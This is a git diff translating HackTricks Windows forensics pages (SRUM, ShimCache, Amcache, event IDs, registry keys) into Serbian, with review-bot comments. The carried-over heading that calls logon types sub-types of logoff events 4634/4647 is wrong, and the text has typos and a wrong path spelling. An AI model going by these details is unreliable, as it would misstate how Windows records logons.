korišćenja sistemskih resursa** (SRUM) **prati** **resurse** **koje koristi** **proces**. Pojavio se u W8 i čuva podatke u ESE bazi podataka smeštenoj u `C:\Windows\System32\sru\SRUDB.dat`. 
-It gives the following information: +Daje sledeće informacije: -- AppID and Path -- User that executed the process -- Sent Bytes -- Received Bytes -- Network Interface -- Connection duration -- Process duration +- AppID i Putanja +- Korisnik koji je izvršio proces +- Poslati bajtovi +- Primljeni bajtovi +- Mrežni interfejs +- Trajanje veze +- Trajanje procesa -This information is updated every 60 mins. - -You can obtain the date from this file using the tool [**srum_dump**](https://github.com/MarkBaggett/srum-dump). +Ove informacije se ažuriraju svake 60 minuta. +Možete dobiti podatke iz ove datoteke koristeći alat [**srum_dump**](https://github.com/MarkBaggett/srum-dump). ```bash .\srum_dump.exe -i C:\Users\student\Desktop\SRUDB.dat -t SRUM_TEMPLATE.xlsx -o C:\Users\student\Desktop\srum ``` - ### AppCompatCache (ShimCache) -The **AppCompatCache**, also known as **ShimCache**, forms a part of the **Application Compatibility Database** developed by **Microsoft** to tackle application compatibility issues. This system component records various pieces of file metadata, which include: +**AppCompatCache**, poznat i kao **ShimCache**, deo je **Baze podataka o kompatibilnosti aplikacija** koju je razvila **Microsoft** kako bi se rešili problemi sa kompatibilnošću aplikacija. 
Ova sistemska komponenta beleži razne delove metapodataka o datotekama, koji uključuju: -- Full path of the file -- Size of the file -- Last Modified time under **$Standard_Information** (SI) -- Last Updated time of the ShimCache -- Process Execution Flag +- Puni put do datoteke +- Veličinu datoteke +- Vreme poslednje izmene pod **$Standard_Information** (SI) +- Vreme poslednje ažuriranja ShimCache-a +- Zastavicu izvršenja procesa -Such data is stored within the registry at specific locations based on the version of the operating system: +Ovi podaci se čuvaju u registru na specifičnim lokacijama u zavisnosti od verzije operativnog sistema: -- For XP, the data is stored under `SYSTEM\CurrentControlSet\Control\SessionManager\Appcompatibility\AppcompatCache` with a capacity for 96 entries. -- For Server 2003, as well as for Windows versions 2008, 2012, 2016, 7, 8, and 10, the storage path is `SYSTEM\CurrentControlSet\Control\SessionManager\AppcompatCache\AppCompatCache`, accommodating 512 and 1024 entries, respectively. +- Za XP, podaci se čuvaju pod `SYSTEM\CurrentControlSet\Control\SessionManager\Appcompatibility\AppcompatCache` sa kapacitetom za 96 unosa. +- Za Server 2003, kao i za verzije Windows-a 2008, 2012, 2016, 7, 8 i 10, putanja za skladištenje je `SYSTEM\CurrentControlSet\Control\SessionManager\AppcompatCache\AppCompatCache`, sa kapacitetom od 512 i 1024 unosa, respektivno. -To parse the stored information, the [**AppCompatCacheParser** tool](https://github.com/EricZimmerman/AppCompatCacheParser) is recommended for use. +Za analizu sačuvanih informacija, preporučuje se korišćenje [**AppCompatCacheParser** alata](https://github.com/EricZimmerman/AppCompatCacheParser). ![](<../../../images/image (488).png>) ### Amcache -The **Amcache.hve** file is essentially a registry hive that logs details about applications that have been executed on a system. It is typically found at `C:\Windows\AppCompat\Programas\Amcache.hve`. 
+Datoteka **Amcache.hve** je u suštini registri hives koji beleži detalje o aplikacijama koje su izvršene na sistemu. Obično se nalazi na `C:\Windows\AppCompat\Programas\Amcache.hve`. -This file is notable for storing records of recently executed processes, including the paths to the executable files and their SHA1 hashes. This information is invaluable for tracking the activity of applications on a system. - -To extract and analyze the data from **Amcache.hve**, the [**AmcacheParser**](https://github.com/EricZimmerman/AmcacheParser) tool can be used. The following command is an example of how to use AmcacheParser to parse the contents of the **Amcache.hve** file and output the results in CSV format: +Ova datoteka je značajna jer čuva zapise o nedavno izvršenim procesima, uključujući putanje do izvršnih datoteka i njihove SHA1 heš vrednosti. Ove informacije su neprocenjive za praćenje aktivnosti aplikacija na sistemu. +Za ekstrakciju i analizu podataka iz **Amcache.hve**, može se koristiti [**AmcacheParser**](https://github.com/EricZimmerman/AmcacheParser) alat. Sledeća komanda je primer kako koristiti AmcacheParser za analizu sadržaja datoteke **Amcache.hve** i izlaz rezultata u CSV formatu: ```bash AmcacheParser.exe -f C:\Users\genericUser\Desktop\Amcache.hve --csv C:\Users\genericUser\Desktop\outputFolder ``` +Među generisanim CSV datotekama, `Amcache_Unassociated file entries` je posebno značajan zbog bogatih informacija koje pruža o neudruženim unosima datoteka. -Among the generated CSV files, the `Amcache_Unassociated file entries` is particularly noteworthy due to the rich information it provides about unassociated file entries. - -The most interesting CVS file generated is the `Amcache_Unassociated file entries`. +Najzanimljivija CVS datoteka koja je generisana je `Amcache_Unassociated file entries`. 
### RecentFileCache -This artifact can only be found in W7 in `C:\Windows\AppCompat\Programs\RecentFileCache.bcf` and it contains information about the recent execution of some binaries. +Ovaj artefakt se može naći samo u W7 u `C:\Windows\AppCompat\Programs\RecentFileCache.bcf` i sadrži informacije o nedavnoj izvršavanju nekih binarnih datoteka. -You can use the tool [**RecentFileCacheParse**](https://github.com/EricZimmerman/RecentFileCacheParser) to parse the file. +Možete koristiti alat [**RecentFileCacheParse**](https://github.com/EricZimmerman/RecentFileCacheParser) za analizu datoteke. -### Scheduled tasks +### Zakazane radnje -You can extract them from `C:\Windows\Tasks` or `C:\Windows\System32\Tasks` and read them as XML. +Možete ih izvući iz `C:\Windows\Tasks` ili `C:\Windows\System32\Tasks` i pročitati ih kao XML. -### Services +### Servisi -You can find them in the registry under `SYSTEM\ControlSet001\Services`. You can see what is going to be executed and when. +Možete ih pronaći u registru pod `SYSTEM\ControlSet001\Services`. Možete videti šta će biti izvršeno i kada. ### **Windows Store** -The installed applications can be found in `\ProgramData\Microsoft\Windows\AppRepository\`\ -This repository has a **log** with **each application installed** in the system inside the database **`StateRepository-Machine.srd`**. +Instalirane aplikacije se mogu naći u `\ProgramData\Microsoft\Windows\AppRepository\`\ +Ova repozitorija ima **log** sa **svakom instaliranom** aplikacijom u sistemu unutar baze podataka **`StateRepository-Machine.srd`**. -Inside the Application table of this database, it's possible to find the columns: "Application ID", "PackageNumber", and "Display Name". These columns have information about pre-installed and installed applications and it can be found if some applications were uninstalled because the IDs of installed applications should be sequential. 
+Unutar tabele aplikacija ove baze podataka, moguće je pronaći kolone: "Application ID", "PackageNumber" i "Display Name". Ove kolone sadrže informacije o unapred instaliranim i instaliranim aplikacijama i može se utvrditi da li su neke aplikacije deinstalirane jer bi ID-ovi instaliranih aplikacija trebali biti sekvencijalni. -It's also possible to **find installed application** inside the registry path: `Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Applications\`\ -And **uninstalled** **applications** in: `Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Deleted\` +Takođe je moguće **pronaći instaliranu aplikaciju** unutar registra na putu: `Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Applications\`\ +I **deinstalirane** **aplikacije** u: `Software\Microsoft\Windows\CurrentVersion\Appx\AppxAllUserStore\Deleted\` -## Windows Events +## Windows događaji -Information that appears inside Windows events are: +Informacije koje se pojavljuju unutar Windows događaja su: -- What happened -- Timestamp (UTC + 0) -- Users involved -- Hosts involved (hostname, IP) -- Assets accessed (files, folder, printer, services) +- Šta se desilo +- Vreme (UTC + 0) +- Uključeni korisnici +- Uključeni hostovi (hostname, IP) +- Pristupeni resursi (datoteke, folderi, štampači, servisi) -The logs are located in `C:\Windows\System32\config` before Windows Vista and in `C:\Windows\System32\winevt\Logs` after Windows Vista. Before Windows Vista, the event logs were in binary format and after it, they are in **XML format** and use the **.evtx** extension. +Logovi se nalaze u `C:\Windows\System32\config` pre Windows Vista i u `C:\Windows\System32\winevt\Logs` posle Windows Vista. Pre Windows Vista, logovi događaja su bili u binarnom formatu, a posle toga su u **XML formatu** i koriste **.evtx** ekstenziju. 
-The location of the event files can be found in the SYSTEM registry in **`HKLM\SYSTEM\CurrentControlSet\services\EventLog\{Application|System|Security}`** +Lokacija datoteka događaja može se pronaći u SYSTEM registru u **`HKLM\SYSTEM\CurrentControlSet\services\EventLog\{Application|System|Security}`** -They can be visualized from the Windows Event Viewer (**`eventvwr.msc`**) or with other tools like [**Event Log Explorer**](https://eventlogxp.com) **or** [**Evtx Explorer/EvtxECmd**](https://ericzimmerman.github.io/#!index.md)**.** +Mogu se vizualizovati iz Windows Event Viewer-a (**`eventvwr.msc`**) ili sa drugim alatima kao što su [**Event Log Explorer**](https://eventlogxp.com) **ili** [**Evtx Explorer/EvtxECmd**](https://ericzimmerman.github.io/#!index.md)**.** -## Understanding Windows Security Event Logging +## Razumevanje Windows sigurnosnog logovanja događaja -Access events are recorded in the security configuration file located at `C:\Windows\System32\winevt\Security.evtx`. This file's size is adjustable, and when its capacity is reached, older events are overwritten. Recorded events include user logins and logoffs, user actions, and changes to security settings, as well as file, folder, and shared asset access. +Događaji pristupa se beleže u datoteci sigurnosne konfiguracije koja se nalazi na `C:\Windows\System32\winevt\Security.evtx`. Veličina ove datoteke je prilagodljiva, a kada se dostigne njena kapacitet, stariji događaji se prepisuju. Beleženi događaji uključuju prijave i odjave korisnika, korisničke akcije i promene u sigurnosnim postavkama, kao i pristup datotekama, folderima i zajedničkim resursima. -### Key Event IDs for User Authentication: +### Ključni ID-evi događaja za autentifikaciju korisnika: -- **EventID 4624**: Indicates a user successfully authenticated. -- **EventID 4625**: Signals an authentication failure. -- **EventIDs 4634/4647**: Represent user logoff events. -- **EventID 4672**: Denotes login with administrative privileges. 
+- **EventID 4624**: Ukazuje na uspešnu autentifikaciju korisnika. +- **EventID 4625**: Signalizira neuspeh autentifikacije. +- **EventIDs 4634/4647**: Predstavljaju događaje odjave korisnika. +- **EventID 4672**: Označava prijavu sa administratorskim privilegijama. -#### Sub-types within EventID 4634/4647: +#### Podtipovi unutar EventID 4634/4647: -- **Interactive (2)**: Direct user login. -- **Network (3)**: Access to shared folders. -- **Batch (4)**: Execution of batch processes. -- **Service (5)**: Service launches. -- **Proxy (6)**: Proxy authentication. -- **Unlock (7)**: Screen unlocked with a password. -- **Network Cleartext (8)**: Clear text password transmission, often from IIS. -- **New Credentials (9)**: Usage of different credentials for access. -- **Remote Interactive (10)**: Remote desktop or terminal services login. -- **Cache Interactive (11)**: Login with cached credentials without domain controller contact. -- **Cache Remote Interactive (12)**: Remote login with cached credentials. -- **Cached Unlock (13)**: Unlocking with cached credentials. +- **Interaktivno (2)**: Direktna prijava korisnika. +- **Mrežno (3)**: Pristup zajedničkim folderima. +- **Serijski (4)**: Izvršenje serijskih procesa. +- **Servis (5)**: Pokretanje servisa. +- **Proxy (6)**: Proxy autentifikacija. +- **Otključavanje (7)**: Ekran otključan lozinkom. +- **Mrežni čisti tekst (8)**: Prenos lozinke u čistom tekstu, često iz IIS-a. +- **Nove kredencijale (9)**: Korišćenje različitih kredencijala za pristup. +- **Daljinsko interaktivno (10)**: Prijava putem daljinske radne površine ili terminalskih usluga. +- **Keširano interaktivno (11)**: Prijava sa keširanim kredencijalima bez kontakta sa kontrolerom domena. +- **Keširano daljinsko interaktivno (12)**: Daljinska prijava sa keširanim kredencijalima. +- **Keširano otključavanje (13)**: Otključavanje sa keširanim kredencijalima. 
-#### Status and Sub Status Codes for EventID 4625: +#### Status i podstatus kodovi za EventID 4625: -- **0xC0000064**: User name does not exist - Could indicate a username enumeration attack. -- **0xC000006A**: Correct user name but wrong password - Possible password guessing or brute-force attempt. -- **0xC0000234**: User account locked out - May follow a brute-force attack resulting in multiple failed logins. -- **0xC0000072**: Account disabled - Unauthorized attempts to access disabled accounts. -- **0xC000006F**: Logon outside allowed time - Indicates attempts to access outside of set login hours, a possible sign of unauthorized access. -- **0xC0000070**: Violation of workstation restrictions - Could be an attempt to login from an unauthorized location. -- **0xC0000193**: Account expiration - Access attempts with expired user accounts. -- **0xC0000071**: Expired password - Login attempts with outdated passwords. -- **0xC0000133**: Time sync issues - Large time discrepancies between client and server may be indicative of more sophisticated attacks like pass-the-ticket. -- **0xC0000224**: Mandatory password change required - Frequent mandatory changes might suggest an attempt to destabilize account security. -- **0xC0000225**: Indicates a system bug rather than a security issue. -- **0xC000015b**: Denied logon type - Access attempt with unauthorized logon type, such as a user trying to execute a service logon. +- **0xC0000064**: Korisničko ime ne postoji - Može ukazivati na napad na enumeraciju korisničkog imena. +- **0xC000006A**: Tačno korisničko ime, ali pogrešna lozinka - Mogući pokušaj pogađanja lozinke ili brute-force napad. +- **0xC0000234**: Korisnički nalog je zaključan - Može uslediti nakon brute-force napada koji rezultira višestrukim neuspelim prijavama. +- **0xC0000072**: Nalog onemogućen - Neovlašćeni pokušaji pristupa onemogućenim nalozima. 
+- **0xC000006F**: Prijava van dozvoljenog vremena - Ukazuje na pokušaje pristupa van postavljenih sati prijave, mogući znak neovlašćenog pristupa. +- **0xC0000070**: Kršenje ograničenja radne stanice - Može biti pokušaj prijave sa neovlašćenog mesta. +- **0xC0000193**: Istek naloga - Pokušaji pristupa sa isteklim korisničkim nalozima. +- **0xC0000071**: Istekla lozinka - Pokušaji prijave sa zastarelim lozinkama. +- **0xC0000133**: Problemi sa sinhronizacijom vremena - Velike vremenske razlike između klijenta i servera mogu ukazivati na sofisticiranije napade poput pass-the-ticket. +- **0xC0000224**: Obavezna promena lozinke potrebna - Česte obavezne promene mogu sugerisati pokušaj destabilizacije sigurnosti naloga. +- **0xC0000225**: Ukazuje na grešku u sistemu, a ne na sigurnosni problem. +- **0xC000015b**: Odbijeni tip prijave - Pokušaj pristupa sa neovlašćenim tipom prijave, kao što je korisnik koji pokušava da izvrši prijavu servisa. #### EventID 4616: -- **Time Change**: Modification of the system time, could obscure the timeline of events. +- **Promena vremena**: Izmena sistemskog vremena, može zamagliti hronologiju događaja. -#### EventID 6005 and 6006: +#### EventID 6005 i 6006: -- **System Startup and Shutdown**: EventID 6005 indicates the system starting up, while EventID 6006 marks it shutting down. +- **Pokretanje i gašenje sistema**: EventID 6005 označava pokretanje sistema, dok EventID 6006 označava gašenje. #### EventID 1102: -- **Log Deletion**: Security logs being cleared, which is often a red flag for covering up illicit activities. +- **Brisanje logova**: Brisanje sigurnosnih logova, što je često znak za prikrivanje nelegalnih aktivnosti. -#### EventIDs for USB Device Tracking: +#### EventIDs za praćenje USB uređaja: -- **20001 / 20003 / 10000**: USB device first connection. -- **10100**: USB driver update. -- **EventID 112**: Time of USB device insertion. +- **20001 / 20003 / 10000**: Prva konekcija USB uređaja. 
+- **10100**: Ažuriranje USB drajvera. +- **EventID 112**: Vreme umetanja USB uređaja. -For practical examples on simulating these login types and credential dumping opportunities, refer to [Altered Security's detailed guide](https://www.alteredsecurity.com/post/fantastic-windows-logon-types-and-where-to-find-credentials-in-them). +Za praktične primere simulacije ovih tipova prijava i mogućnosti iskopavanja kredencijala, pogledajte [detaljni vodič Altered Security](https://www.alteredsecurity.com/post/fantastic-windows-logon-types-and-where-to-find-credentials-in-them). -Event details, including status and sub-status codes, provide further insights into event causes, particularly notable in Event ID 4625. +Detalji događaja, uključujući status i podstatus kodove, pružaju dodatne uvide u uzroke događaja, posebno u Event ID 4625. -### Recovering Windows Events +### Oporavak Windows događaja -To enhance the chances of recovering deleted Windows Events, it's advisable to power down the suspect computer by directly unplugging it. **Bulk_extractor**, a recovery tool specifying the `.evtx` extension, is recommended for attempting to recover such events. +Da biste povećali šanse za oporavak obrisanih Windows događaja, preporučuje se da isključite sumnjivi računar direktnim isključivanjem. **Bulk_extractor**, alat za oporavak koji specificira ekstenziju `.evtx`, se preporučuje za pokušaj oporavka takvih događaja. -### Identifying Common Attacks via Windows Events +### Identifikacija uobičajenih napada putem Windows događaja -For a comprehensive guide on utilizing Windows Event IDs in identifying common cyber attacks, visit [Red Team Recipe](https://redteamrecipe.com/event-codes/). +Za sveobuhvatan vodič o korišćenju Windows Event ID-ova u identifikaciji uobičajenih sajber napada, posetite [Red Team Recipe](https://redteamrecipe.com/event-codes/). 
-#### Brute Force Attacks +#### Brute Force napadi -Identifiable by multiple EventID 4625 records, followed by an EventID 4624 if the attack succeeds. +Identifikovani višestrukim zapisima EventID 4625, praćenim EventID 4624 ako napad uspe. -#### Time Change +#### Promena vremena -Recorded by EventID 4616, changes to system time can complicate forensic analysis. +Zabeležena sa EventID 4616, promene u sistemskom vremenu mogu otežati forenzičku analizu. -#### USB Device Tracking +#### Praćenje USB uređaja -Useful System EventIDs for USB device tracking include 20001/20003/10000 for initial use, 10100 for driver updates, and EventID 112 from DeviceSetupManager for insertion timestamps. +Korisni sistemski EventID-ovi za praćenje USB uređaja uključuju 20001/20003/10000 za početnu upotrebu, 10100 za ažuriranja drajvera i EventID 112 iz DeviceSetupManager-a za vremenske oznake umetanja. -#### System Power Events +#### Događaji napajanja sistema -EventID 6005 indicates system startup, while EventID 6006 marks shutdown. +EventID 6005 označava pokretanje sistema, dok EventID 6006 označava gašenje. -#### Log Deletion +#### Brisanje logova -Security EventID 1102 signals the deletion of logs, a critical event for forensic analysis. +Sigurnosni EventID 1102 signalizira brisanje logova, što je kritičan događaj za forenzičku analizu. -
- -{% embed url="https://websec.nl/" %} {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md b/src/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md index 840b910bc..2f0d6d4cd 100644 --- a/src/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md +++ b/src/forensics/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md 
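Review bot: The translated paragraphs in this hunk drop the blank lines that separated them in the source: the removed blank line after `-This information is updated every 60 mins.` and the one after the Amcache description have no `+` counterpart, so `+Ove informacije se ažuriraju svake 60 minuta.` and `+Možete dobiti podatke iz ove datoteke ...` (and likewise the two Amcache sentences) will render as a single paragraph; restore the blank lines. The heading `+#### Podtipovi unutar EventID 4634/4647` carries over a source error: the values listed under it (Interaktivno 2, Mrežno 3, Daljinsko interaktivno 10, ...) are the Logon Type field of the 4624/4625 logon records listed just above, not sub-types of the 4634/4647 logoff events, so the heading is wrong in both languages. Other source defects worth fixing while the lines are touched: `+Najzanimljivija CVS datoteka ...` keeps the `CVS` typo (CSV) and repeats the sentence directly above it, and the Amcache path `C:\Windows\AppCompat\Programas\Amcache.hve` keeps `Programas` although the RecentFileCache path in the same hunk uses `AppCompat\Programs`. Minor Serbian: `svake 60 minuta` should be `svakih 60 minuta`, and `registri hives` should be `registry hive` (or `košnica registra`). Finally, the hunk deletes the `{% embed url="https://websec.nl/" %}` block and its surrounding blank lines with no replacement; that is a content change beyond translation and should be stated in the commit message or split into its own commit.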
@@ -1,101 +1,101 @@ -# Interesting Windows Registry Keys +# Zanimljive Windows Registry Ključevi -### Interesting Windows Registry Keys +### Zanimljive Windows Registry Ključevi {{#include ../../../banners/hacktricks-training.md}} -### **Windows Version and Owner Info** +### **Informacije o verziji Windows-a i vlasniku** -- Located at **`Software\Microsoft\Windows NT\CurrentVersion`**, you'll find the Windows version, Service Pack, installation time, and the registered owner's name in a straightforward manner. +- Nalazi se na **`Software\Microsoft\Windows NT\CurrentVersion`**, gde možete pronaći verziju Windows-a, Service Pack, vreme instalacije i ime registrovanog vlasnika na jednostavan način. -### **Computer Name** +### **Ime računara** -- The hostname is found under **`System\ControlSet001\Control\ComputerName\ComputerName`**. +- Ime hosta se nalazi pod **`System\ControlSet001\Control\ComputerName\ComputerName`**. -### **Time Zone Setting** +### **Podešavanje vremenske zone** -- The system's time zone is stored in **`System\ControlSet001\Control\TimeZoneInformation`**. +- Vremenska zona sistema se čuva u **`System\ControlSet001\Control\TimeZoneInformation`**. -### **Access Time Tracking** +### **Praćenje vremena pristupa** -- By default, the last access time tracking is turned off (**`NtfsDisableLastAccessUpdate=1`**). To enable it, use: - `fsutil behavior set disablelastaccess 0` +- Po defaultu, praćenje poslednjeg vremena pristupa je isključeno (**`NtfsDisableLastAccessUpdate=1`**). Da biste ga omogućili, koristite: +`fsutil behavior set disablelastaccess 0` -### Windows Versions and Service Packs +### Verzije Windows-a i Service Pack-ovi -- The **Windows version** indicates the edition (e.g., Home, Pro) and its release (e.g., Windows 10, Windows 11), while **Service Packs** are updates that include fixes and, sometimes, new features. +- **Verzija Windows-a** označava izdanje (npr. Home, Pro) i njegovu verziju (npr. 
Windows 10, Windows 11), dok su **Service Pack-ovi** ažuriranja koja uključuju ispravke i, ponekad, nove funkcije. -### Enabling Last Access Time +### Omogućavanje praćenja poslednjeg vremena pristupa -- Enabling last access time tracking allows you to see when files were last opened, which can be critical for forensic analysis or system monitoring. +- Omogućavanje praćenja poslednjeg vremena pristupa omogućava vam da vidite kada su datoteke poslednji put otvorene, što može biti ključno za forenzičku analizu ili praćenje sistema. -### Network Information Details +### Detalji o mrežnim informacijama -- The registry holds extensive data on network configurations, including **types of networks (wireless, cable, 3G)** and **network categories (Public, Private/Home, Domain/Work)**, which are vital for understanding network security settings and permissions. +- Registry sadrži opsežne podatke o mrežnim konfiguracijama, uključujući **tipove mreža (bežične, kablovske, 3G)** i **kategorije mreža (Javna, Privatna/Domaća, Domen/Rad)**, što je od vitalnog značaja za razumevanje mrežnih bezbednosnih postavki i dozvola. -### Client Side Caching (CSC) +### Keširanje na klijentskoj strani (CSC) -- **CSC** enhances offline file access by caching copies of shared files. Different **CSCFlags** settings control how and what files are cached, affecting performance and user experience, especially in environments with intermittent connectivity. +- **CSC** poboljšava pristup offline datotekama keširanjem kopija deljenih datoteka. Različita podešavanja **CSCFlags** kontrolišu kako i koje datoteke se keširaju, utičući na performanse i korisničko iskustvo, posebno u okruženjima sa povremenom povezanošću. -### AutoStart Programs +### AutoStart programi -- Programs listed in various `Run` and `RunOnce` registry keys are automatically launched at startup, affecting system boot time and potentially being points of interest for identifying malware or unwanted software. 
+- Programi navedeni u raznim `Run` i `RunOnce` registry ključevima automatski se pokreću prilikom pokretanja, utičući na vreme podizanja sistema i potencijalno predstavljajući tačke interesa za identifikaciju malvera ili neželjenog softvera. ### Shellbags -- **Shellbags** not only store preferences for folder views but also provide forensic evidence of folder access even if the folder no longer exists. They are invaluable for investigations, revealing user activity that isn't obvious through other means. +- **Shellbags** ne samo da čuvaju podešavanja za prikaz foldera, već takođe pružaju forenzičke dokaze o pristupu folderima čak i ako folder više ne postoji. Oni su neprocenjivi za istrage, otkrivajući aktivnost korisnika koja nije očigledna kroz druge načine. -### USB Information and Forensics +### USB informacije i forenzika -- The details stored in the registry about USB devices can help trace which devices were connected to a computer, potentially linking a device to sensitive file transfers or unauthorized access incidents. +- Detalji o USB uređajima pohranjeni u registry-ju mogu pomoći u praćenju koji su uređaji bili povezani sa računarom, potencijalno povezujući uređaj sa osetljivim prenosima datoteka ili incidentima neovlašćenog pristupa. -### Volume Serial Number +### Serijski broj volumena -- The **Volume Serial Number** can be crucial for tracking the specific instance of a file system, useful in forensic scenarios where file origin needs to be established across different devices. +- **Serijski broj volumena** može biti ključan za praćenje specifične instance datotečnog sistema, koristan u forenzičkim scenarijima gde je potrebno utvrditi poreklo datoteke preko različitih uređaja. -### **Shutdown Details** +### **Detalji o gašenju** -- Shutdown time and count (the latter only for XP) are kept in **`System\ControlSet001\Control\Windows`** and **`System\ControlSet001\Control\Watchdog\Display`**. 
+- Vreme gašenja i broj gašenja (potonji samo za XP) se čuvaju u **`System\ControlSet001\Control\Windows`** i **`System\ControlSet001\Control\Watchdog\Display`**. -### **Network Configuration** +### **Mrežna konfiguracija** -- For detailed network interface info, refer to **`System\ControlSet001\Services\Tcpip\Parameters\Interfaces{GUID_INTERFACE}`**. -- First and last network connection times, including VPN connections, are logged under various paths in **`Software\Microsoft\Windows NT\CurrentVersion\NetworkList`**. +- Za detaljne informacije o mrežnim interfejsima, pogledajte **`System\ControlSet001\Services\Tcpip\Parameters\Interfaces{GUID_INTERFACE}`**. +- Prva i poslednja vremena mrežne veze, uključujući VPN veze, beleže se pod raznim putanjama u **`Software\Microsoft\Windows NT\CurrentVersion\NetworkList`**. -### **Shared Folders** +### **Deljeni folderi** -- Shared folders and settings are under **`System\ControlSet001\Services\lanmanserver\Shares`**. The Client Side Caching (CSC) settings dictate offline file availability. +- Deljeni folderi i podešavanja su pod **`System\ControlSet001\Services\lanmanserver\Shares`**. Podešavanja za keširanje na klijentskoj strani (CSC) određuju dostupnost offline datoteka. -### **Programs that Start Automatically** +### **Programi koji se automatski pokreću** -- Paths like **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run`** and similar entries under `Software\Microsoft\Windows\CurrentVersion` detail programs set to run at startup. +- Putanje kao što su **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run`** i slični unosi pod `Software\Microsoft\Windows\CurrentVersion` detaljno opisuju programe postavljene da se pokreću prilikom pokretanja. -### **Searches and Typed Paths** +### **Pretrage i unesene putanje** -- Explorer searches and typed paths are tracked in the registry under **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer`** for WordwheelQuery and TypedPaths, respectively. 
+- Pretrage u Explorer-u i unesene putanje se prate u registry-ju pod **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer`** za WordwheelQuery i TypedPaths, respektivno. -### **Recent Documents and Office Files** +### **Nedavni dokumenti i Office datoteke** -- Recent documents and Office files accessed are noted in `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs` and specific Office version paths. +- Nedavni dokumenti i Office datoteke koje su pristupane beleže se u `NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs` i specifičnim putanjama verzije Office-a. -### **Most Recently Used (MRU) Items** +### **Najčešće korišćeni (MRU) stavke** -- MRU lists, indicating recent file paths and commands, are stored in various `ComDlg32` and `Explorer` subkeys under `NTUSER.DAT`. +- MRU liste, koje ukazuju na nedavne putanje datoteka i komande, čuvaju se u raznim `ComDlg32` i `Explorer` podključevima pod `NTUSER.DAT`. -### **User Activity Tracking** +### **Praćenje aktivnosti korisnika** -- The User Assist feature logs detailed application usage stats, including run count and last run time, at **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count`**. +- Funkcija User Assist beleži detaljne statistike korišćenja aplikacija, uključujući broj pokretanja i vreme poslednjeg pokretanja, na **`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count`**. -### **Shellbags Analysis** +### **Analiza Shellbags** -- Shellbags, revealing folder access details, are stored in `USRCLASS.DAT` and `NTUSER.DAT` under `Software\Microsoft\Windows\Shell`. Use **[Shellbag Explorer](https://ericzimmerman.github.io/#!index.md)** for analysis. +- Shellbags, koji otkrivaju detalje o pristupu folderima, čuvaju se u `USRCLASS.DAT` i `NTUSER.DAT` pod `Software\Microsoft\Windows\Shell`. Koristite **[Shellbag Explorer](https://ericzimmerman.github.io/#!index.md)** za analizu. 
-### **USB Device History** +### **Istorija USB uređaja** -- **`HKLM\SYSTEM\ControlSet001\Enum\USBSTOR`** and **`HKLM\SYSTEM\ControlSet001\Enum\USB`** contain rich details on connected USB devices, including manufacturer, product name, and connection timestamps. -- The user associated with a specific USB device can be pinpointed by searching `NTUSER.DAT` hives for the device's **{GUID}**. -- The last mounted device and its volume serial number can be traced through `System\MountedDevices` and `Software\Microsoft\Windows NT\CurrentVersion\EMDMgmt`, respectively. +- **`HKLM\SYSTEM\ControlSet001\Enum\USBSTOR`** i **`HKLM\SYSTEM\ControlSet001\Enum\USB`** sadrže bogate detalje o povezanim USB uređajima, uključujući proizvođača, naziv proizvoda i vremenske oznake povezivanja. +- Korisnik povezan sa specifičnim USB uređajem može se precizno odrediti pretraživanjem `NTUSER.DAT` hives za **{GUID}** uređaja. +- Poslednji montirani uređaj i njegov serijski broj volumena mogu se pratiti kroz `System\MountedDevices` i `Software\Microsoft\Windows NT\CurrentVersion\EMDMgmt`, respektivno. -This guide condenses the crucial paths and methods for accessing detailed system, network, and user activity information on Windows systems, aiming for clarity and usability. +Ovaj vodič sažima ključne putanje i metode za pristup detaljnim informacijama o sistemu, mreži i aktivnostima korisnika na Windows sistemima, sa ciljem jasnoće i upotrebljivosti. {{#include ../../../banners/hacktricks-training.md}} diff --git a/src/forensics/basic-forensic-methodology/windows-forensics/windows-processes.md b/src/forensics/basic-forensic-methodology/windows-forensics/windows-processes.md index 06f914970..a06fe2426 100644 --- a/src/forensics/basic-forensic-methodology/windows-forensics/windows-processes.md +++ b/src/forensics/basic-forensic-methodology/windows-forensics/windows-processes.md 
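Review bot: `+`fsutil behavior set disablelastaccess 0`` loses the leading indentation that the original `  `fsutil behavior set disablelastaccess 0`` line had, so the command no longer renders as the continuation of the `Praćenje vremena pristupa` bullet; keep the two-space indent. The title `+# Zanimljive Windows Registry Ključevi` and the duplicated `###` heading below it have wrong agreement; `Zanimljivi Windows Registry ključevi` is the correct form. The path `Interfaces{GUID_INTERFACE}` is missing the separator before the placeholder in both the old and the new text, unlike `UserAssist\{GUID}\Count` later in the same hunk; since the line is rewritten anyway, correct it to `Interfaces\{GUID_INTERFACE}`.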
